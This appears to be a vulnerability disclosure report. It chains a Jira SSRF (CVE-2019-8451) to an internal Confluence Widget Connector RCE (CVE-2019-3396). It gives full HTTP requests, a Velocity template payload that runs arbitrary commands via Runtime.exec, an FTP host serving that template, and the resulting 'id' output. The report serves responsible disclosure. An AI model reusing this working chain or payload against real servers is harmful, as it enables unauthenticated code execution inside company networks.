This report describes a combination of two separate vulnerabilities in two separate services. This chain of vulnerabilities allows an unauthenticated attacker to run arbitrary code on a server inside the company's internal network.
Jira at https://jira.tochka.com is vulnerable to SSRF in the /plugins/servlet/gadgets/makeRequest resource - CVE-2019-8451.
Anyone on the internet can make it issue arbitrary HTTPS requests and read responses.
Moreover:
This allows an attacker to reach the internal Confluence instance at https://confluence.bank24.int.
Confluence at https://confluence.bank24.int uses a vulnerable version of the Widget Connector plugin. This vulnerability leads to an RCE (CVE-2019-3396).
There is an advisory by Atlassian. Also, there is a publicly known exploit to this vulnerability.
https://jira.tochka.com:[email protected]/
This bug could be used to send requests to an internal Confluence server https://confluence.bank24.int like so:
Request example:
POST /plugins/servlet/gadgets/makeRequest HTTP/1.1
Host: jira.tochka.com
User-Agent: curl/7.61.1
Accept: */*
X-Atlassian-Token: no-check
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
Connection: close
url=https://jira.tochka.com:[email protected]
Response snippet:
throw 1; < don't be evil' >{"https://jira.tochka.com:[email protected]":{"rc":200,"headers":{},"body":"<!DOCTYPE html>\n<html>\n<head>\n <title>Рабочий стол - Confluence<\/title>\n \n \n\n \n \n \n \n\n \n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=EDGE,chrome=IE7\">\n<meta charset=\"UTF-8\">\n<meta id=\"confluence-context-path\" name=\"confluence-context-path\" content=\"\">\n<meta id=\"confluence-base-url\" name=\"confluence-base-url\" content=\"https://confluence.bank24.int\">\n\n<meta id=\"atlassian-token\" name=\"atlassian-token\" content=\"f999fa99a5663c168e72b407eecdeec3695c70d0\">\n\n\n<script type=\"text/javascript\">\n var contextPath = '';\n<\/script>\n\n \n\n <meta name=\"confluence-request-time\" content=\"1571051898165\">\n \n \n \n <meta name=\"ajs-discovered-plugin-features\" content=\"$discoveredList\">\n <meta name=\"ajs-use-keyboard-shortcuts\" content=\"true\">\n <meta name=\"ajs-keyboardshortcut-hash\" content=\"97637bc20dfc7a1f15684630bc99897\">\n <meta id=\"team-calendars-has-jira-link\" content=\"true\">\n <meta name=\"ajs-team-calendars-display-time-format\" content=\"displayTimeFormat24\">\n <meta id=\"team-calendars-display-week-number\" content=\"false\">\n <meta
...
It looks like you have restrictions in place for outgoing HTTP and HTTPS requests, but not for FTP.
I set up an FTP server to serve a malicious template at ftp://68.183.67.159/qwe2.txt
The file contents are:
#set ($exp="exp")
#set ($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($command))
#set ($input=$exp.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $exp.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($exp.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
$scan.next()
#end
3232
It takes a command parameter, executes the corresponding command and returns the result.
To trigger this chain of vulnerabilities, execute the following request:
POST /plugins/servlet/gadgets/makeRequest HTTP/1.1
Host: jira.tochka.com
User-Agent: curl/7.61.1
Accept: */*
X-Atlassian-Token: no-check
Content-Length: 322
Content-Type: application/x-www-form-urlencoded
Connection: close
url=https://jira.tochka.com:[email protected]/rest/tinymce/1/macro/preview&httpMethod=POST&headers=content-type%3Dapplication/json&postData={"contentId":"1","macro":{"body":"","params":{"url":"https://www.youtube.com/watch?v=y6sOtXOvchY","_template":"ftp://68.183.67.159/qwe2.txt","command":"id"},"name":"widget"}}
This makes Jira send a macro preview request to Confluence. Confluence then fetches the template from the FTP server and executes the id command.
Response snippet:
...
<div>\n uid=502(confluence) gid=502(confluence) groups=502(confluence) context=unconfined_u:system_r:initrc_t:s0\n\r\n3232\r\n\n <\/div>\n
...
You may change the command parameter to your liking.
Widget Connector plugin version 3.1.4 or higher.
This chain of vulnerabilities allows an unauthenticated attacker to run arbitrary code on a server inside the company's internal network.